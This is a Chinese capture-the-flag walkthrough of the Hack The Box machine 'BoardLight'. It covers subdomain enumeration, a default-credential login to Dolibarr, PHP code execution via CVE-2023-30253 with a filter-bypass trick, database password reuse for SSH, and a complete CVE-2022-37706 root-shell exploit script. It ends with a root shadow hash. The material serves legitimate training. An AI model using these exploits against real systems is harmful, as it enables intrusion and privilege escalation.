扫描靶机
nmap -p 1-65535 -T4 -A -v 10.10.11.11
扫描出4个端口,有个邮件服务,没啥用处,先看80端口
页面没什么信息可以得到,看后台代码,可以得到一个域名:Board.htb
跑一下目录
dirsearch -u http://board.htb/
跑出了一些目录,但是用处不大,然后跑一下子域名
wfuzz -c -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -u "http://board.htb/" -H "Host: FUZZ.board.htb" --hc 404 --hl 517
找到了一个子域名crm,写到hosts,然后打开
找到了一个cms,Dolibarr的,版本是17.0.0,使用默认账号可以登录进去,admin:admin
登录进去了,在网上可以寻找该版本的poc
https://www.tenable.com/cve/CVE-2023-30253
https://github.com/Dolibarr/dolibarr
利用该版本的exp,可以新建一个网站,然后写入带有rce的php,点击网站选项新建一个
新建完成后新建一个page,写入名字标题,最底下写入代码
创建完成后会出现page的id编码
鼠标停到放大镜那里会告诉你如何访问你新建的网站
点击编辑html源填写代码
echo system("whoami")."<br><br>";
直接保存后会自动运行php代码,头部php要大写,不然会被拦截
在里面添加rce的php,然后直接运行
成功的反弹了shell,搜索一下文件夹,在/var/www/html/crm.board.htb/htdocs/conf里面可以找到一个conf.php文件,里面记录了数据库的用户信息
使用该用户登录到数据库查看一下内容
$dolibarr_main_url_root='http://crm.board.htb';
$dolibarr_main_document_root='/var/www/html/crm.board.htb/htdocs';
$dolibarr_main_url_root_alt='/custom';
$dolibarr_main_document_root_alt='/var/www/html/crm.board.htb/htdocs/custom';
$dolibarr_main_data_root='/var/www/html/crm.board.htb/documents';
$dolibarr_main_db_host='localhost';
$dolibarr_main_db_port='3306';
$dolibarr_main_db_name='dolibarr';
$dolibarr_main_db_prefix='llx_';
$dolibarr_main_db_user='dolibarrowner';
$dolibarr_main_db_pass='serverfun2$2023!!';
$dolibarr_main_db_type='mysqli';
$dolibarr_main_db_character_set='utf8';
$dolibarr_main_db_collation='utf8_unicode_ci';
// Authentication settings
$dolibarr_main_authentication='dolibarr';
使用该密码验证一下能否登录ssh
成功登录了,拿到了user flag,密码是:serverfun2$2023!!,上传linpeas.sh查看一下提权信息
可以看到一个/usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_sys,这个属于属于Enlightenment系列,这是一种用于Linux系统的轻量级桌面环境,enlightenment_sys是Enlightenment用于执行系统操作的工具,如果enlightenment_sys配置不当或存在缺陷,可能允许本地用户以root或其他特权用户的身份执行命令,可以使用这个脚本,根据脚本里面的步骤可以测试得知能否使用
https://github.com/MaherAzzouzi/CVE-2022-37706-LPE-exploit
成功拿到了root flag
echo "CVE-2022-37706"
echo "[*] Trying to find the vulnerable SUID file..."
echo "[*] This may take few seconds..."
file=$(find / -name enlightenment_sys -perm -4000 2>/dev/null | head -1)
if [[ -z ${file} ]]
then
echo "[-] Couldn't find the vulnerable SUID file..."
echo "[*] Enlightenment should be installed on your system."
exit 1
fi
echo "[+] Vulnerable SUID binary found!"
echo "[+] Trying to pop a root shell!"
mkdir -p /tmp/net
mkdir -p "/dev/../tmp/;/tmp/exploit"
echo "/bin/sh" > /tmp/exploit
chmod a+x /tmp/exploit
echo "[+] Enjoy the root shell :)"
${file} /bin/mount -o noexec,nosuid,utf8,nodev,iocharset=utf8,utf8=0,utf8=1,uid=$(id -u), "/dev/../tmp/;/tmp/exploit" /tmp///net
root:$6$h9/xKUsFWX90kjQc$qcBeHXPiRHqbF0NgNxhPiZzYS1DiH4UnQc2kcshKtYEDPbjDe3E5qihEbapIJk8fAxRaj3T7EGReRQYiFIBHO1:19845:0:99999:7:::
原文始发于微信公众号(Jiyou too beautiful):HTB-BoardLight笔记
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论